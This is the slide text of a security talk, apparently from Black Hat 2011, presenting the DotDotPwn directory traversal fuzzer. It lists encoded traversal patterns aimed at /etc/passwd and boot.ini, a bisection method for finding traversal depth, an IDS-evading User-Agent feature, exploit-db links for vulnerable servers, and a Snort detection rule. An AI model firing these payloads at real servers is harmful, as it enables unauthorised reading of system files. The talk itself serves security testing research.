  • 15. ../../ General Information Design / Architecture INPUTS FUZZ PATTERNS OUTPUTS CREATION Modules manual OS type HTTP Traversal Engine OS detection HTTP URL ../../ .... ..%2f..%2f Deepness FTP ..%255c..%255c ..%c0%2f..%c0%2f ..%u2215..%u2215 TFTP ..%uF025..%uF025 ..%25c1%259c..%25c1%259c Filenames %252e%252e%c0%5c%252e%252e%c0%5c PAYLOAD STDOUT Dots & Slashes Encodings C
  • 16. ../../ General Information Usage options USAGE.txt N
  • 17. ../../ General Information Usage options EXAMPLES.txt (one example per module) C
  • 18. ../../ General Information Website / Contact README.txt Official Website: http://dotdotpwn.sectester.net Official Email: dotdotpwn@sectester.net Bugs / Contributions / Improvements: dotdotpwn@sectester.net C
  • 19. ../../ General Information Download DotDotPwn v3.0beta: INCLUDED IN BLACK HAT USA 2011 CONFERENCE CD DotDotPwn v2.1: PacketStormSecurity: http://packetstormsecurity.org/files/view/95399/dotdotpwn-v2.1.tar.gz BackTrack Linux 4 R2: # apt-get update # apt-get install dotdotpwn # cd /pentest/fuzzers/dotdotpwn/ # ./dotdotpwn.pl Mirror: http://www.brainoverflow.org/code/dotdotpwn-v2.1.tar.gz N
  • 20. ../../ General Information Contributions AUTHORS.txt Contribution: Idea Implementation of the Bisection Algorithm (http://en.wikipedia.org/wiki/Bisection_method) once a vulnerability has been found in order to determine the exact deepness of the directory traversal. Origin of -X switch. By: Roberto Salgado aka LightOS http://twitter.com/LightOS http://www.websec.ca ------------------------------------- Contribution: Idea and Code Not always include the @Extra_files (e.g. web.config, httpd.conf, etc.). Origin of the -e switch. Specify the Operating System type if known ("windows" or "unix"). Origin of the -o switch. By: Eduardo Ruiz Duarte aka Beck http://twitter.com/toorandom http://math.co.ro http://b3ck.blogspot.com ------------------------------------- Contribution: Code Save a results' report into the Reports folder. Origin of the -r switch. Treatment of SIGINT in order to print the number of traversals found when Ctrl + C is pressed. Random User-Agent in HTTP requests for IDS/IPS detection avoidance. By: Diego Boy http://twitter.com/Diego_Boy ------------------------------------- Contribution: Code Random User-Agent in HTTP requests for IDS/IPS detection avoidance. By: Cristian Urrutia aka Gashnark http://twitter.com/blion_tec N
  • 21. ../../ General Information To Do  Implementation of the Bisection Algorithm to determine the exact deepness of the directory traversal. The bisection method in mathematics, is a root-finding method which repeatedly bisects an interval then selects a subinterval in which a root must lie for further processing. Source: http://en.wikipedia.org/wiki/Bisection_method ../../../../../../../../../../../../../../../../etc/passwd (16) ../../../../../../../../etc/passwd (16/2 = 8) ../../../../../../../../../../../../etc/passwd ((8+16) / 2 = 12) ../../../../../../../../../../etc/passwd ((8+12) / 2 = 10) ../../../../../../../../../../../etc/passwd ((10+12) / 2 = 11) 5 requests instead of 11 ! N
  • 22. ../../ Vulnerabilities Discovered vulnerabilities Tested software  HTTP: 72  Web platforms: 2 (CMS’s)  FTP: 25  TFTP: 11 C
  • 24. ../../ Vulnerabilities Discovered vulnerabilities Exploits  MultiThreaded HTTP Server [chr1x] – http://www.exploit-db.com/exploits/12304  Wing FTP Server v3.4.3 [chr1x] - http://packetstormsecurity.org/1005-exploits/wingftp-traversal.txt  VicFTPS v5.0 [chr1x] – http://www.exploit-db.com/exploits/12498  TFTP Desktop 2.5 [chr1x] - http://www.exploit-db.com/exploits/14857  TFTPDWIN v0.4.2 [chr1x] - http://www.exploit-db.com/exploits/14856  Femitter FTP Server 1.04 [chr1x] - http://www.exploit-db.com/exploits/15445  Home FTP Server <= r1.11.1 (build 149) [chr1x] - http://www.exploit-db.com/exploits/15349  Yaws 1.89 HTTP Server [nitrØus] - http://www.exploit-db.com/exploits/15371  Mongoose 2.11 HTTP Server (Win32) [nitrØus] - http://www.exploit-db.com/exploits/15373 N
  • 25. ../../ Vulnerabilities Discovered vulnerabilities 3.4.5 – 2nd Traversal found ! 3.4.3 DotDotPwn iz Breaking Patches! 3.4.2  3.4.1 3.4.0 - 1st Traversal found ! ================= 56 days of exposure!! C
  • 26. ../../ Traversal Engine Description Traversal Engine ../../ .... ..%2f..%2f ..%255c..%255c ..%c0%2f..%c0%2f ..%u2215..%u2215 ..%uF025..%uF025 ..%25c1%259c..%25c1%259c %252e%252e%c0%5c%252e%252e%c0%5c N
  • 29. ../../ Traversal Engine Fuzz patterns generation N
  • 30. ../../ Traversal Engine Intelligent Fuzzing At the beggining of this presentation … Then … N
  • 31. ../../ Traversal Engine Intelligent Fuzzing  Fuzz patterns according to the Operating System detected (nmap) ../../../boot.ini on *NIX-like ../../../boot.ini on Windows ../../../etc/passwd on Windows ../../../etc/passwd on *NIX-like N
  • 33. ../../ Traversal Engine Intelligent Fuzzing  Encoding of slashes (/) for the correct semantics in the fuzzing patterns ..%2f..%2fetc/passwd ..%2f..%2fetc%2fpasswd %2e%2e%c0%af%2e%2e%c0%afwindowssystem32driversetchosts %2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers %c0%afetc%c0%afhosts N
  • 35. ../../ Modules HTTP #DotDowPwn #snort-2.8.4 - snort-2.9.x, and suricata alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN DotDotPwn User-Agent"; flow: established,to_server; content:"User-Agent|3A| DotDotPwn"; nocase; http_header; threshold: type limit, track by_src,count 1, seconds 60; classtype: attempted-recon; reference:url,dotdotpwn.sectester.net; sid:yyyyyy; rev:1;) C
  • 36. ../../ Modules HTTP  Additional verification to avoid false positives N
  • 39. ../../ Modules FTP  Compliance with RFC 959 - File Transfer Protocol  Double testing approach:  CD <directory> & GET <file>  GET <directory><file> N
  • 41. ../../ Modules TFTP  A little hack in the TFTP.pm module’s constructor to improve the testing speed (-t switch in DotDotPwn) N
  • 44. ../../ Upcoming release… DotDotPwn v4.0 …Stay tuned.
  • 45. ../../ Greetings  r1l0, b0rr3x, l1l1th, chipx0r, preth00nker, NataS, Darko, beck, Daemon, dex, Alination, Carlos Ayala, hkm, calderpwn, tr3w, hecky, raito, BelindoFan etc etc…  Helga alt3kx :**  Contributors  GuadalajaraCON Crew  www.underground.org.mx  #mendozaaaa  CRAc, hkm, alt3kx, tr3w, beck, cldrn, LightOS, xScPx, Daemon, SirDarckCat, Rolman, Crypkey, KBrown, nediam, beavis, kaz, Carlos A. Ayala, corelanc0d3r, Héctor López, Raaka (el_gaupo), dex, Cj, preth00nker, Humberto Ochoa, ch0ks, ran, Federico L. Bossi Bonin, Bucio, javi3r, sunLevy, Zeus, etc… C/N
  • 47. ../../ Thanks ! chr1x & nitrØus @ Solar Vision 3 Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), ), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org